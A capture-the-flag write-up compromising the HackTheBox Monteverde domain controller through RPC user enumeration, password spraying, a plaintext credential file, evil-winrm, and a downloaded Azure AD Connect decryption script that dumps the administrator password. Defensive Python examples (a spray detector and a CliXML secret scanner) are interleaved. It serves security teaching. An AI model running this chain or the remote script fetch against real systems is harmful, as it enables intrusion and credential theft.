title: HackTheBox-Monteverde
author: Mosaic Theory
layout: true
categories: 漏洞实验
tags:
• Active Directory
Recon:
# Nmap 7.92SVN scan initiated Thu May 26 13:28:07 2022 as: nmap -sC -sV -Pn -p- -oA nmap.txt 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.60s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-26 05:37:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
| date: 2022-05-26T05:38:55
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 26 13:39:38 2022 -- 1 IP address (1 host up) scanned in 691.10 seconds
SMB does not allow anonymous access:
$ smbmap -H 10.10.10.172
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
So the only way in is through RPC:
$ rpcclient -U "" -N 10.10.10.172
rpcclient $> exit
$ rpcclient -U "" -N 10.10.10.172 -c enumdomusers > user.txt
$ cat user.txt
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
$ cat user.txt | awk -F "[" '{print $2}' > newuser.txt
$ cat newuser.txt| awk -F "]" '{print $1}' > exitusers.txt
$ cat exitusers.txt
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
That gave me a username wordlist.
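The awk pipeline above does the job, but it silently produces garbage on any line that is not in the `user:[NAME] rid:[0xHEX]` form. As an added example (not part of this writeup), here is a small Python parser for `rpcclient enumdomusers` output that also decodes the RID and labels the accounts an auditor would want to look at first; the sample input is constructed from the lines above, and the `svc-`/`AAD_` name heuristics are my own assumptions, not anything rpcclient reports:

```python
import re
from typing import List, NamedTuple

# Constructed sample of `rpcclient -c enumdomusers` output, in the
# `user:[NAME] rid:[0xHEX]` format shown above.
SAMPLE_ENUM = """\
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
"""

LINE_RE = re.compile(r"^user:\[(?P<name>[^\]]*)\]\s+rid:\[0x(?P<rid>[0-9a-fA-F]+)\]\s*$")

# Well-known RIDs identify built-in accounts even when they have been renamed.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest", 502: "krbtgt"}


class DomainUser(NamedTuple):
    name: str
    rid: int


def parse_enumdomusers(text: str) -> List[DomainUser]:
    """Parse enumdomusers output; fail loudly on a line that does not match."""
    users = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: unexpected format: {line!r}")
        users.append(DomainUser(m["name"], int(m["rid"], 16)))
    return users


def classify(user: DomainUser) -> str:
    """Label accounts worth a closer audit look (RID first, then name heuristics)."""
    if user.rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[user.rid]
    if user.name.lower().startswith("svc-"):
        return "service account (name heuristic, assumption)"
    if user.name.startswith("AAD_"):
        return "Azure AD Connect sync account (name heuristic, assumption)"
    return "user"


def usernames(text: str) -> List[str]:
    """The same plain username list the awk pipeline produces."""
    return [u.name for u in parse_enumdomusers(text)]


if __name__ == "__main__":
    for u in parse_enumdomusers(SAMPLE_ENUM):
        print(f"{u.name:20s} rid={u.rid:<6d} {classify(u)}")
```

`usernames()` gives the same wordlist as the awk pipeline; the RID decode is what tells you that `Guest` here really is RID 501 and that the `svc-*` and `SABatchJobs` accounts sit in one contiguous RID block, i.e. they were created together.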
SMB:
I kept digging through RPC but found no passwords, so I tried password spraying the users, feeding the collected username list as both the username list and the password list:
$ crackmapexec smb 10.10.10.172 -u user.txt -p user.txt --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
<skip>..............................................
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
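A spray like the one above (one attempt per account, username used as password) leaves a distinctive pattern in the domain controller's logon audit trail: many distinct accounts failing from one source in a short window, possibly followed by one success. As an added example that is not part of this writeup, here is a Python detector run over constructed log lines in a simplified `timestamp event_id source_ip account` form modelled on Windows Security events 4625 (failed logon) and 4624 (successful logon); the second source 10.10.14.7, the 10-minute window and the five-account threshold are my assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample: a username-as-password spray from 10.10.16.11 that hits
# SABatchJobs, plus an unrelated repeated failure for one account from 10.10.14.7.
SAMPLE_LOG = """\
2022-05-26T05:40:01Z 4625 10.10.16.11 Guest
2022-05-26T05:40:02Z 4625 10.10.16.11 AAD_987d7f2f57d2
2022-05-26T05:40:02Z 4625 10.10.16.11 mhope
2022-05-26T05:40:03Z 4624 10.10.16.11 SABatchJobs
2022-05-26T05:40:03Z 4625 10.10.16.11 svc-ata
2022-05-26T05:40:04Z 4625 10.10.16.11 svc-bexec
2022-05-26T05:40:04Z 4625 10.10.16.11 svc-netapp
2022-05-26T05:40:05Z 4625 10.10.16.11 dgalanos
2022-05-26T09:15:00Z 4625 10.10.14.7 mhope
2022-05-26T09:15:30Z 4625 10.10.14.7 mhope
2022-05-26T09:16:00Z 4625 10.10.14.7 mhope
"""


class Event(NamedTuple):
    ts: datetime
    event_id: int
    src: str
    account: str


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, src, acct = line.split()
        events.append(Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), int(eid), src, acct))
    return events


def detect_spray(events: List[Event],
                 window: timedelta = timedelta(minutes=10),
                 min_accounts: int = 5) -> Dict[str, Tuple[int, List[str]]]:
    """Return {source: (distinct accounts failed in one window, accounts that logged on)}
    for every source whose failures span >= min_accounts distinct accounts inside `window`.
    A brute force against a single account never trips this; a spray does."""
    by_src: Dict[str, List[Event]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_src[e.src].append(e)
    alerts: Dict[str, Tuple[int, List[str]]] = {}
    for src, evs in by_src.items():
        failed = [e for e in evs if e.event_id == 4625]
        best: set = set()
        lo = 0
        # Sliding window over the failures; keep the window with most distinct accounts.
        for hi in range(len(failed)):
            while failed[hi].ts - failed[lo].ts > window:
                lo += 1
            accts = {e.account for e in failed[lo:hi + 1]}
            if len(accts) > len(best):
                best = accts
        if len(best) >= min_accounts:
            succeeded = sorted({e.account for e in evs if e.event_id == 4624})
            alerts[src] = (len(best), succeeded)
    return alerts


if __name__ == "__main__":
    for src, (n, ok) in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(f"spray from {src}: {n} accounts tried, successful logons: {ok or 'none'}")
```

The detector keys on account breadth per source rather than failure count per account, which is what separates a spray from a classic brute force, and it reports any 4624 from the same source so the responder immediately sees which credential the spray validated.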
One hit:
$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'azure_uploads'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
azure_uploads READ ONLY
.\azure_uploads\*
dr--r--r-- 0 Fri Jan 3 20:43:36 2020 .
dr--r--r-- 0 Fri Jan 3 20:43:36 2020 ..
$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'users$'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
users$ READ ONLY
.\users$\*
dr--r--r-- 0 Fri Jan 3 21:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 21:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 21:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 21:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 21:14:28 2020 smorgan
.\users$\mhope\*
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 .
dr--r--r-- 0 Fri Jan 3 21:41:18 2020 ..
fw--w--w-- 1212 Fri Jan 3 22:59:24 2020 azure.xml
$ smbclient -U SABatchJobs //10.10.10.172/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
getting file \mhope\azure.xml of size 1212 as azure.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
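The file above is a PowerShell CliXML export (`Export-Clixml`) of a `PSADPasswordCredential`, and the password sits in a plain `<S>` string element; had the property been a SecureString it would have been written as a DPAPI-protected `<SS>` blob instead. As an added example that is not part of this writeup, here is a Python scanner a defender could run over user shares to flag CliXML files that carry secret-looking properties in plaintext; the sample is constructed from the structure above with a placeholder password and a placeholder `<SS>` blob, and the property-name regex is my assumption:

```python
import re
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Union

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names that usually hold secrets (assumption; extend for your environment).
SECRET_NAME_RE = re.compile(r"password|passwd|secret|credential|apikey|token", re.I)

# Constructed sample modelled on azure.xml: same object type and layout, but the
# password value and the <SS> (SecureString) blob are placeholders, not real data.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">EXAMPLE-PLACEHOLDER</S>
      <SS N="ClientSecret">01000000d08c9ddf0115d1118c7a00c04fc297eb</SS>
    </Props>
  </Obj>
</Objs>"""


class Finding(NamedTuple):
    path: str       # dotted property path inside the exported object
    kind: str       # "plaintext" for <S>, "securestring" for <SS>
    type_name: str  # first <T> of the enclosing <Obj>, if present


def scan_clixml(data: Union[str, bytes]) -> List[Finding]:
    """Report every secret-named <S>/<SS> property in a CliXML document."""
    if isinstance(data, bytes):
        # Windows PowerShell's Export-Clixml writes UTF-16 with a BOM (the "��"
        # seen when cat-ing azure.xml); detect that, otherwise assume UTF-8.
        data = data.decode("utf-16") if data[:2] in (b"\xff\xfe", b"\xfe\xff") else data.decode("utf-8-sig")
    root = ET.fromstring(data.lstrip("\ufeff"))  # raises ParseError on malformed input
    findings: List[Finding] = []

    def walk(elem: ET.Element, path: str, type_name: str) -> None:
        tag = elem.tag.split("}", 1)[-1]  # strip the namespace
        name = elem.get("N")
        if tag == "Obj":
            tn = elem.find(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")
            type_name = tn.text if tn is not None and tn.text else type_name
        here = f"{path}.{name}" if name else path
        if name and tag in ("S", "SS") and SECRET_NAME_RE.search(name):
            findings.append(Finding(here.lstrip("."), "plaintext" if tag == "S" else "securestring", type_name))
        for child in elem:
            walk(child, here, type_name)

    walk(root, "", "")
    return findings


def plaintext_secrets(data: Union[str, bytes]) -> List[str]:
    """Only the findings that need action: secrets stored as plain strings."""
    return [f.path for f in scan_clixml(data) if f.kind == "plaintext"]


if __name__ == "__main__":
    for f in scan_clixml(SAMPLE_CLIXML):
        print(f"{f.kind:12s} {f.path:15s} ({f.type_name})")
```

An `<SS>` finding is lower severity because the blob is DPAPI-encrypted to the exporting user and machine; an `<S>` finding on a readable share, as here, is an immediate credential exposure. The scanner walks nested `<Obj>` elements too, so credentials buried inside a larger exported object are reported with their full property path.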
$ echo 4n0therD4y@n0th3r$ > passwd.txt
$ crackmapexec smb 10.10.10.172 -u mhope -p passwd.txt --continue-on-success|grep '[+]'
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
$ smbmap -H 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
WINRM:
$ crackmapexec winrm 10.10.10.172 -u mhope -p passwd.txt --continue-on-success|grep '[+]'
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
$ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\mhope\desktop> ls
Directory: C:\Users\mhope\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\desktop> cat user.txt
4961....................................
*Evil-WinRM* PS C:\Users\mhope\desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : MONTEVERDE
Primary Dns Suffix . . . . . . . : MEGABANK.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : MEGABANK.LOCAL
$ bloodhound-python --zip -c All -u mhope -p 4n0therD4y@n0th3r$ -ns 10.10.10.172 -dc MONTEVERDE.MEGABANK.LOCAL -d MEGABANK.LOCAL
INFO: Found AD domain: megabank.local
INFO: Connecting to LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 13 users
INFO: Connecting to GC LDAP server: MONTEVERDE.MEGABANK.LOCAL
INFO: Found 65 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MONTEVERDE.MEGABANK.LOCAL
INFO: Done in 00M 52S
INFO: Compressing output into 20220526142408_bloodhound.zip
*Evil-WinRM* PS C:\Users\mhope\desktop> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 1/3/2020 6:29:59 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\mhope\desktop>
Azure:
mhope is a member of the Azure Admins group. For background on Azure AD Connect, see:
https://blog.xpnsec.com/azuread-connect-for-redteam/
Quoted from that article:
The first, and arguably the most interesting, is Password Hash Synchronisation (PHS), which uploads user accounts and password hashes from Active Directory into Azure. The second method is Pass-through Authentication (PTA), which lets Azure forward authentication requests to the on-premises AD rather than relying on uploaded hashes. Finally there is Federation, the traditional ADFS deployment we have seen many times. PHS... smells like DCSync. To begin our analysis of PHS, we should look at one of the assemblies responsible for handling password hash synchronisation, Microsoft.Online.PasswordSynchronization.dll. This assembly can be found in the default installation path of Azure AD Sync, C:\Program Files\Microsoft Azure AD Sync\Bin.
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> ls *Microsoft.Online.PasswordSynchronization.dll*
Directory: C:\Program Files\Microsoft Azure AD Sync\Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 136248 Microsoft.Online.PasswordSynchronization.dll
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin>
The article also points to the assembly responsible for key management and for decrypting this data, C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> ls *mcrypt.dll*
Directory: C:\Program Files\Microsoft Azure AD Sync\Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 335744 mcrypt.dll
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin>
I used that author's PoC script directly:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> cd /programdata
*Evil-WinRM* PS C:\programdata> wget http://10.10.16.11/Get-AzureADPasswd.ps1 -O Get-AzureADPasswd.ps1
*Evil-WinRM* PS C:\programdata> . .\Get-AzureADPasswd.ps1
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\programdata>
$ evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
129............................................